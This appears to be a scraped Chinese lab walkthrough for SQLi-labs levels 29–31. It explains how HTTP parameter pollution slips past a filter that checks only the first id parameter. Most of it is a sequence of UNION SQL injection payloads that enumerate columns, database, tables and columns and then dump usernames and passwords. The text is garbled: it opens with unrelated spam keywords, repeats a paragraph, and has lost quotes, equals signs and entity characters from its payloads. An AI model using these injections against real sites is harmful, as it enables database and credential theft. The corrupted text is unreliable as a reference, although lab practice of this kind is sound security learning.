旅游门户网站模板下载,全国最新产品代理商,wordpress 加一个form,全球品牌网一#xff1a;HTTP参数污染#xff1a;
hpp#xff08;http parameter pollution)注入中#xff0c;可以通过在hppt的请求中注入多个同名参数来绕过安全过滤
原理#xff1a;php默认只取最后一个同名参数
比如在这一关里#xff0c;可能对第一个id参数进行消毒处理HTTP参数污染
hpphttp parameter pollution)注入中可以通过在hppt的请求中注入多个同名参数来绕过安全过滤
原理php默认只取最后一个同名参数
比如在这一关里可能对第一个id参数进行消毒处理但php实际执行的时候使用了第二个没被消毒的id参数
二判断闭合方式
输入?id1和?id1的时候产生报错 用两个参数进行单引号闭合 闭合成功 三开始攻击
1.判断列数
?id1id1 order by 1,2,3,4-- 三列
2.爆回显位
?id1id-1 union select 1,2,3-- 3.爆数据库名版本号
?id1id-1 union select 1,database(),version()-- 4.爆表名行数
?id1id-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schemadatabase()-- 5.爆列名
?id1id-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_nameusers-- 6.爆数据
?id1id-1 union select 1,group_concat(username,:,password),3 from users-- ps1
在查看源码和尝试注入的过程中发现本关waf的拦截好像并没有起作用题目存在误导性用布尔检测和盲注应该也能正常做
ps2
第三十关把闭合方式改成了双引号 ” 第三十一关把闭合方式改成了双引号括号 “其余全部相同
❀❀❀ 完结撒花❀❀❀